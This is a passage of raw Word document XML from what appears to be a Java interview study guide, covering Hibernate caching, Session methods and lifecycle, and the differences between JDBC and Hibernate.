          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0314D9"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o enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D439D2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15EFBBB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901A603"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ntity setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A99F5"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C010FD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3FC8872A"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0AF61F9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255CC">
          <v:rect id="_x0000_i2416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F279D35"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457"/>
        <w:gridCol w:w="2305"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="20B558BC" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC6C58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5D95C77A"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1 Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56128CE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2 Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="18D1F04C" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6819E8B4"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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45013B6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B4FA0A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Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3A7BA345" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48FC42B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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1099302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5FD99D7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r>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="40049EAC" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34336642"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ing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E6C3C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session-local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59F2506F"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across sessions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="27DF6F21" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C47F8F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4027C6D8"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needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51042A8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manual setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="596612E7" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B71DC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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FE3E8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eated access in session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB07ADC"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DB hits app-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BEFFE9C"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F224C9">
          <v:rect id="_x0000_i2417" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01078696"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8C2C8CA"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1 is session-scoped and automatic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DABE1"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2 is global-scoped and optional, used for better performance and scalability in large applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57414862" w14:textId="3F78CCCD" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D91B4" w14:textId="3C8CEEDC" w:rsidR="006764D9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D60772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="_Toc197867775"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the hibernate sessions</w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
    </w:p>
    <w:p w14:paraId="7322C91C" w14:textId="7D0E04B0" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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s the primary interface used to interact with the database. It represents a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single unit of work</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the database and acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper around JDBC connections</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A23AC"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7EAD7A">
          <v:rect id="_x0000_i2419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687319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About Hibernate Session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B851E02"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rovided by the SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDCEB27"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perform CRUD operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235E208"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thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CFC7D"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Maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-level cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF0800"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fecycle is short-lived (per transaction or request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742B18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21517">
          <v:rect id="_x0000_i2420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A082F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598"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="033AA9CA" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CCD4D8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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B23B09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B6242D0" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C905371"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ve(Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DE049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serts new entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="00764402" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73A9DD0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t(Class, id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56907F7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es entity, returns null if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C4170F9" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541BC369"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Class, id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4824864F"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azily fetches entity, throws exception if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2462F62E" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3597C5F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Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A936A5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s existing entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="06A809B9" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="038AF82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Object obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="055E1DC0"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s entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="10CFEB16" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7789AFC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Query()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782A7B7A"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ecutes HQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="39DA2973" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137A76E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Transaction()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C30091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s transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="22CEBD9A" w14:textId="77777777" w:rsidTr="00726D4F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0174F60D"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close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0FF8F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loses the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="704C7FDB"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FB8E6">
          <v:rect id="_x0000_i2421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1D644"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2A15C32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FEC577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8E4D8E2" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E612FB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 = session.get(Employee.class, 1);  // Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170629C"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setName("Updated Name");                   // Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83E06E" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514582B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72B3E35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A258A65"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031B">
          <v:rect id="_x0000_i2422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B466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 Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608545A"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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: From SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898DB5B"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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Perform CRUD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B242A05"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Must always close session to release resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CD45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B506F3">
          <v:rect id="_x0000_i2423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19DA6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Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB827F"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less Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn’t cache or track entity changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A1203"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ful Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default, maintains cache, tracks changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01C8B2"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87C3C">
          <v:rect id="_x0000_i2424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D12B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6436C8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425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE90BD" w14:textId="17AD25E9" w:rsidR="00C12794" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12794">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="_Toc197867776"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between JDBC and Hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
    </w:p>
    <w:p w14:paraId="348FFACE" w14:textId="78C27A0F" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674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3281"/>
        <w:gridCol w:w="4603"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5CDD6FAB" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12958D27"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0E54BC41"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DBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C6CE19"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ibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3E853B0F" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3611E41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6769031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API, manual SQL handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A7E83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framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="4291A0D3" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18379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QL Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26FE1ED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veloper writes SQL manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF1DBF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is auto-generated using HQL/Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="273D0C25" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D39AB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 Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE4279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object-relational mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ACEB68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Java objects to DB tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6330D582" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C07BCA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Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FDC80D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4947D12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 or declarative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="200D3673" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637BC97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1EECFA5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caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="044D2EE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upports first and second level caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
